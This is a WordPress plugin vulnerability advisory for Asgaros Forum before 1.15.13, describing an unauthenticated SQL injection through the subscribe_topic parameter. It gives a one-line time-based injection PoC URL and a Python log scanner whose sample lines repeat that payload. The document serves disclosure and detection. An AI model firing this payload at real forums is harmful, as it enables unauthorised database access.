wpvulndb
JrXnm
WPVDB-ID:36CC5151-1D5E-4874-BCEC-3B6326235DB1
Oct 11, 2021 - 12:00 a.m.

Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection

2021-10-11 00:00:00
JrXnm
wpscan.com
20

EPSS: 0.213 Low
Percentile: 96.5%

When a user subscribes to a topic, the plugin does not validate and escape the user input before using it in a SQL statement, leading to an unauthenticated SQL injection issue.

PoC

https://example.com/forum/?subscribe_topic=1 union select 1 and sleep(10)
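One way to spot requests like the PoC above in web server access logs, added here as an example and not taken from the advisory or the plugin: it flags any `subscribe_topic` value that is not a plain integer. The log lines are constructed, and treating a legitimate topic ID as a short decimal integer is an assumption based on the `subscribe_topic=1` prefix of the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2021:10:00:01 +0000] "GET /forum/?subscribe_topic=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Oct/2021:10:00:07 +0000] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/1.1" 200 5120 "-" "curl/7.79"
203.0.113.9 - - [11/Oct/2021:10:00:30 +0000] "GET /forum/?subscribe_topic=1+union+select+1+and+sleep(10) HTTP/1.1" 200 5120 "-" "curl/7.79"
198.51.100.2 - - [11/Oct/2021:10:01:00 +0000] "GET /forum/?view=topic&id=7 HTTP/1.1" 200 4801 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request target; the target may contain raw spaces.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"'
)
# Assumption: a legitimate topic ID is a short decimal integer.
TOPIC_ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_subscribe_requests(log_text, param="subscribe_topic"):
    """Return (client_ip, timestamp, decoded_value) for every request whose
    `param` value is anything other than a plain decimal integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        # parse_qs percent-decodes values and turns '+' into a space, so
        # differently encoded forms of the same input compare equal.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if not TOPIC_ID_RE.fullmatch(value):
                hits.append((ip, ts, value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_subscribe_requests(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric subscribe_topic: {value!r}")
```

The same integer-only rule is what the server side should enforce before the value reaches a SQL statement, so a hit in the logs of a patched site indicates probing rather than compromise.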

CPE
Name            Operator    Version
asgaros-forum   lt          1.15.13
